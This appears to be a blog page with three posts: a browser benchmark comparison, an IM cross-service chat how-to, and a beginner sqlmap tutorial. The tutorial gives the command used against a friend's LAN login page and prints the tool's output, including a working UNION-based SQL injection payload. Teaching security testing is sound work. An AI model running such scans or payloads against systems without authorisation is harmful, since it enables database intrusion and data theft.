The Battle of 2020 Web Browser

Well, on some chances, I've done to compare what is best for 2020 web browser both in Windows and Android. For the experiment, I used 5 ultimate independent browser benchmark such as:
  1. JetStream (https://browserbench.org/JetStream/) 
  2. Motionmark (https://browserbench.org/MotionMark/
  3. Speedometer (https://browserbench.org/Speedometer/)
  4. Basemark (https://web.basemark.com/
  5. WebXPRT (https://www.principledtechnologies.com/benchmarkxprt/webxprt/2018/3_v5/)
I compared a new baby born browser successor from Internet Explorer aka Microsoft Edge with Mozilla Firefox on Dell Inspiron 13 running Windows 10, and here below the result:


Also for Android, I compared Microsoft Edge with Samsung Browser on Galaxy Note 9, and here below the result:


Welcome to the battle, Microsoft Edge...

Labels: , , , , , , ,

  Post a Comment

Basic Hacking with SQLMap

Mostly, web programmers didn't care about how to protect their website project from hackers. They always depends on infrastructure outside the servers (the firewall, the proxy or something else). Such of it, it's very important to announce security points of programming to newbie web programmers. At least they'll learn securing application logic from beneath.

So much hacking techniques what hacker often did, from basic Cross Site Scripting (XSS) until SQL Injection, etc. Those techniques may range from a bit risk to a significant security damage.

Before a website project launched for public, it is recommended to run the security test in order to make sure that the project already secured for hackers - in basic ways. There's some tools available on the internet to help the test running. One of the tools named as SQLMap, it's an open source project. SQLMap - AFAIK - is more complete to do some SQL injection tests and much powerful than Havij.

To get start, download the latest SQLMap from sourceforge.net. Also make sure that Python package already installed on your system since SQLMap is a Python script based.



Assume that you have a web target to test (in this article, I use my friend's server on LAN). All I'm doing is touching the login page (index.php). Look below pictures, there's only 2 variable contains on that page (username & password) with POST method referring to cek_login.php file.



According to bit information above, open terminal or command prompt (for Windows) and enter below syntax :

Eko-Wahyudihartos-iMac:sqlmap ekowahyudiharto$ python sqlmap.py -u "http://10.2.2.144/arsip/admin/cek_login.php" method "POST" --data "username=xxxx" -f


Look wait wait for the response:

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:38:31

[10:38:31] [INFO] using '/Users/ekowahyudiharto/sqlmap/output/10.2.2.144/session' as session file
[10:38:31] [INFO] testing connection to the target url
[10:38:31] [INFO] testing if the url is stable, wait a few seconds
[10:38:32] [INFO] url is stable
[10:38:32] [INFO] testing if POST parameter 'username' is dynamic
[10:38:32] [WARNING] POST parameter 'username' is not dynamic
[10:38:32] [WARNING] heuristic test shows that POST parameter 'username' might not be injectable
[10:38:32] [INFO] testing sql injection on POST parameter 'username'
[10:38:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:38:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:38:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:38:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[10:38:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:38:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:38:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[10:38:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[10:38:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:38:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:38:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[10:38:33] [INFO] testing 'Oracle AND time-based blind'
[10:38:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
sqlmap got a 302 redirect to media.php - What target address do you want to use from now on? http://10.2.2.144:80/arsip/admin/cek_login.php (default) or provide another target address based also on the redirection got from the application

>
[10:38:41] [INFO] target url appears to be UNION injectable with 6 columns
[10:38:41] [INFO] POST parameter 'username' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
POST parameter 'username' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 101 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: username=xxxx' UNION ALL SELECT CONCAT(CHAR(58,99,120,117,58),CHAR(88,99,102,100,86,121,111,76,88,88),CHAR(58,104,104,108,58)), NULL, NULL, NULL, NULL, NULL# AND 'OghT'='OghT
---

[10:39:06] [INFO] testing MySQL
[10:39:06] [INFO] confirming MySQL
[10:39:06] [INFO] the back-end DBMS is MySQL
[10:39:06] [INFO] actively fingerprinting MySQL
[10:39:06] [INFO] executing MySQL comment injection fingerprint

web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
comment injection fingerprint: MySQL 5.0.75
[10:39:10] [INFO] Fetched data logged to text files under '/Users/ekowahyudiharto/sqlmap/output/10.2.2.144'

[*] shutting down at: 10:39:10


Look at the response above!



Attention: this article describes a very basic information about how to make a security test on web based application, therefore also containing illegal material on it. More explorations needed to gain advantages to the using of SQLMap. The SQLMap on this article is used only for educational purposed only.

Credit: Thanks to Kadek Eva Suputra for giving me server & project experiment to test and I Wayan Chandra Winetra for giving me a brilliant topic to review.

Labels: , , , , ,

  Post a Comment

Make a Chat from Single IM Account to Multiple IM services

If I only have a single IM account, can I make a chat with my friends who have different account on Google Talk, MSN Live, AIM or Yahoo Messenger? For example, if you have name@domain.com & you can chat with friend@yahoo.com or friend@hotmail.com or friend@gmail.com. If you’re on this case, I said: Yes you can! Being have a single IM account will looks more personally than anyone who kept several different of it. Let say, if you had a Yahoo account (eg: name@yahoo.com), then your chat communication is limited to your friends who has the same domain from yahoo.com. It is equal if you have Google account (eg: name@gmail.com) since your friends only comes with the same gmail.com domain. Then, how to make a chat conversation from one account to friends who has different account? Just use a Google account (or any email domain name you want), register it to Live, download & log on from Windows Live Messenger (or your favorite universal IM client).



On this experiment, I using Google Apps account with personal domain name (eg: name@domain.com). By default, Google Apps can communicate with Google Talk users from gmail.com & AIM account (after you registered to AIM). As the picture displayed above, you need to submit your email address to Windows Live first. Once you have registered to it, you will have the “passport” to communicate with MSN Live, Hotmail & Yahoo users. The last thing is, download Windows Live Messenger & try out to log on from it.



Now, you ready to chat with Yahoo messenger account. Try to send a chat request to one of your friend. The same picture below will display on your screen.



While on your friend screen will display a similar picture below:



On above picture, both of red circle explain that the conversation comes from non-Yahoo account (the first red circle will inform your email address, while the lower red circle displayed the Live logo and an online sign). But, what if your friend using Pidgin client? The pidgin will say that you’re offline. Pretty weird but it’s true.



Anyway, you still can make a chat with it. Moreover, if you use an universal IM client (eg: Pidgin or PSi), it will simplified your chat time since you only need to setup several IM services from your single registered email address. Have a nice try & please share your opinion below.

Labels: , ,

  Post a Comment